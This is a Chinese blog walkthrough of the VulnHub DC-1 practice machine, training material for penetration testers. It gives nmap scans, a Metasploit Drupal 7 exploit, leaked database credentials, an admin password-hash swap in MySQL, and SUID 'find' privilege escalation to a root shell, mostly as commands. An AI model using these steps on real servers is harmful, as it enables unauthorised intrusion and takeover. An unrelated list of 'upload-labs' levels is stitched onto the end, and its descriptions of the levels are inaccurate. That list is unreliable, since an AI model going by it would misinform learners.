综合靶场 DC-1 通关详解(保姆级教学)

DC-1

一、环境搭建:

1、靶机描述

DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操作,但是,您将需要根权限。根据您的技能水平,您可以跳过寻找大多数这些标志,然后继续直。初学者可能会遇到他们以前从未遇到过的挑战,但是谷歌搜索应该是获得完成这个挑战所需的信息所必需的。

  1. 靶场下载地址:https://www.vulnhub.com/entry/dc-1,292/
  • 信息收集

1.首先使用nmap -sP 192.168.223.0/24扫描整个网段内存活的主机(网段是kali的网段每个人的网段的有所差异,根据自己的真实网段进行)

  1. 扫描到网段内存活的主机后,我们再次进行扫描存活主机的端口以及服务。我们使用

:nmap -A -p- -v 192.168.223.129(这里我们判断192.168.223.129疑似目标主机)

发现开放了22端口,开放了ssh服务OpenSSH 6.0p1

发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务

  1. 访问web站点

发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS

searchsploit  drupal 7

  1. 利用MSF渗透
  2. .MSF简单命令介绍

    msfconsole 进入MSF控制台

    search 搜索相应模块

    use            对应模块

    show options   查看信息

    set RHOST   远程主机ip

    run            攻击

搜索drupal模块search drupal

搜索出来的漏洞有时间就一个一个试一试这是我们使用序号1

设置靶场ip(rhosts)查看配置后直接run进行攻击

  1. 拿下flag1.txt后我们查看他的文件里面都有些什么

这里我们使用了whoami查看了一下我是谁发现我们当前在www-data下我们紧接着cd到home查看一下却意外发现了flag4然后在此查看一下里面有什么发现里面有一个flag4.txt的文件当我们想要查看的时候显示我们需要一个配置文件

whoami ——查看我是谁

ls—— 查看

6.我们使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

7.查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件

通过查看可以发我们需要配置文件。Drupal的默认配置文件为:

(/var/www/sites/default/settings.php)

8.这是我们发现了flag2的账号密码

这是我们先进入数据库查看我们使用代码:

mysql -u dbuser -p

  输入密码:R0ck3t

9.查看查找默认的Drupal user 表

(select * from users;)

  发现admin信息

  解决方法:置换drupal密码

10.随后进入www文件下php scripts/password-hash.sh 新密码

然后在进入数据库中把密码字段进行替换

11.登录站点
登录站点账号:admin密码是之前我们自己替换的

Admin  123

我们登录完成后随机翻一翻我们发现了flag3

这里查看发现我们需要一个配置文件

 使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

发现find命令

 使用命令测试,发现为root权限

touch 123

ls

find / -name 123 -exec "whoami" \;

14.发现最后的flag文件

    我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。

find ./ -name 123 -exec "/bin/sh" \;   

whoami

ls

cd /root

ls

    查看cat thefinalflag.txt文件

cat thefinalflag.txt

  1. 我们用翻译软件翻译一下看一下他们给我们返回的是什么。

如果都做到了这里说明你已经掌握本次实验的内容你干的非常好!

你好!要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:尝试利用文件包含漏洞,读取服务器上的敏感文件。 3. Level 3 - XXE漏洞:在上传的 XML 文件中尝试触发外部实体注入。 4. Level 4 - SQL注入漏洞:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 5. Level 5 - SSRF漏洞:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 6. Level 6 - 文件上传漏洞2:绕过上传限制,上传一个恶意文件。 7. Level 7 - 文件包含漏洞2:利用文件包含漏洞,读取服务器上的敏感文件。 8. Level 8 - 反序列化漏洞:尝试触发反序列化漏洞,执行恶意代码。 9. Level 9 - 文件上传漏洞3:绕过上传限制,上传一个恶意文件。 10. Level 10 - 文件包含漏洞3:利用文件包含漏洞,读取服务器上的敏感文件。 11. Level 11 - XXE漏洞2:在上传的 XML 文件中触发外部实体注入。 12. Level 12 - SSRF漏洞2:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 13. Level 13 - 文件上传漏洞4:绕过上传限制,上传一个恶意文件。 14. Level 14 - 文件包含漏洞4:利用文件包含漏洞,读取服务器上的敏感文件。 15. Level 15 - SQL注入漏洞2:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 16. Level 16 - 文件上传漏洞5:绕过上传限制,上传一个恶意文件。 17. Level 17 - 文件包含漏洞5:利用文件包含漏洞,读取服务器上的敏感文件。 18. Level 18 - 反序列化漏洞2:尝试触发反序列化漏洞,执行恶意代码。 19. Level 19 - 文件上传漏洞6:绕过上传限制,上传一个恶意文件。 20. Level 20 - 文件包含漏洞6:利用文件包含漏洞,读取服务器上的敏感文件。 21. Level 21 - XXE漏洞3:在上传的 XML 文件中触发外部实体注入。 请注意,在完成每个关卡时,要仔细阅读相关提示和代码,理解漏洞的原理,并尝试不同的方法来解决问题。祝你顺利通关
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值